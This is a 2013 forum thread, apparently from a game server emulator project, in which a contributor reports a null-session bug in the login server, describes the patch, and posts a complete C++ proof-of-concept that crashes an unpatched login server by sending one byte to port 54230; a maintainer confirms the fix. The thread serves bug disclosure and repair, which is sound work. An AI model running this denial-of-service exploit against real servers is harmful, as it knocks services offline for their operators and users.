Page 1 of 1

Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 8:29 am
by atom0s
Bug Report: http://bugs.dspt.info/show_bug.cgi?id=429

Bug is a result of the login server checking for NULL sessions then attemting to create a session out of the connection. However the check is for a specific packet in the login process which leaves the null session allowed to fall through into the underlying code.

To fix, a second check for NULL after the first handling will prevent the problem from happening.

Small / simple patch to fix the problem.

Re: Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 9:02 am
by atom0s
Just as a heads up, this patch is also fixing an exploit that can be abused to crash the login server easily.
Here is a proof of concept that can abuse this to crash the login server, prior to this patch being applied:

Code: Select all

/**
 * DSP Crash Proof-of-Concept
 * (c) 2012-2013 atom0s [atom0s@live.com]
 *
 * dspcrash_0002!atom0s -- Login server crash exploit.
 *
 */

#pragma comment( lib, "Ws2_32.lib" )
#include <WinSock2.h>
#include <Windows.h>
#include <iostream>

int __cdecl main( int argc, char* argv[] )
{
    std::cout << "========================================================" << std::endl;
    std::cout << "[ DSP Crash Proof-of-Concept (Login Server Crash) ]" << std::endl;
    std::cout << "[ by atom0s (c) 2013 ]" << std::endl;
    std::cout << "========================================================" << std::endl;

    // Validate we have two arguments..
    if (argc < 2)
    {
        std::cout << "[!] Invalid argument count!" << std::endl;
        std::cout << "[!] dspcrash_0002!atom0s.exe [ip_address]" << std::endl;
        return 0;
    }

    // Initialize winsock..
    WSADATA wsaData = { 0 };
    if (WSAStartup( MAKEWORD( 2, 2 ), &wsaData ))
    {
        std::cout << "[!] Failed to initialize Winsock!" << std::endl;
        return ERROR_SUCCESS;
    }
    std::cout << "[!] Winsock initialized!" << std::endl;

    // Create the socket..
    auto sock = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
    if (sock == NULL)
    {
        std::cout << "[!] Failed to create socket." << std::endl;
        WSACleanup();
        return ERROR_SUCCESS;
    }
    std::cout << "[!] Socket created!" << std::endl;

    // Prepare socket..
    struct sockaddr_in saddr    = { 0 };
    memset( &saddr, 0x00, sizeof( sockaddr_in ) );
    saddr.sin_addr.S_un.S_addr  = inet_addr( argv[1] );
    saddr.sin_family            = AF_INET;
    saddr.sin_port              = htons( 54230 );

    // Connect to the target..
    if (connect( sock, (struct sockaddr*)&saddr, sizeof( saddr ) ))
    {
        std::cout << "[!] Failed to connect to target server!" << std::endl;
        closesocket( sock );
        WSACleanup();
        return ERROR_SUCCESS;
    }

    // Send the exploit packet..
    unsigned char packet[] = { 0x00, 0x00 };
    if (send( sock, (const char*)packet, 1, 0 ) != 1)
    {
        std::cout << "[!] Failed to send exploit packet!" << std::endl;
        closesocket( sock );
        WSACleanup();
        return ERROR_SUCCESS;
    }

    std::cout << "[!] Packet was sent to target server!" << std::endl;
    std::cout << "[!] Exploit complete!" << std::endl;

    // Cleanup and return..
    closesocket( sock );
    WSACleanup();

    // Suspend for visibility..
    if (argc == 3) Sleep( 5000 );

    return ERROR_SUCCESS;
}

Re: Login Server Bugfix (Exploit Fix)

Posted: Wed Jun 12, 2013 9:15 am
by whasf
Committed r3508

thank you!